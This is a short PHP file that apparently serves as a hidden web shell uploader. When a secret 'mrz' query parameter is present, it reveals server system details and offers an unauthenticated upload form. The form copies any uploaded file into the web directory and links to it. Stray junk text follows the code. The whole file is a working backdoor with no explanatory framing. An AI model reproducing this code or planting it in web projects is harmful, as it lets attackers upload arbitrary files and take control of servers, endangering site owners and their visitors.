<?php
if ( isset($_GET['mrz']) )
{
	echo '<center><b>'.php_uname().'<br></b><b><br><br>'.''.'<br></b>';
	echo '<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">';
	echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
		echo '<a href="#">Hello Dady</a>';
	if( $_POST['_upl'] == "Upload" ) {
		if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done</b><br><br><a href="./' . $_FILES['file']['name'] . '">' . $_FILES['file']['name'] . '</a>'; }
		else { echo '<b>Not Upload File !</b><br><br>'; }
	}
exit;
}?>
asdasd
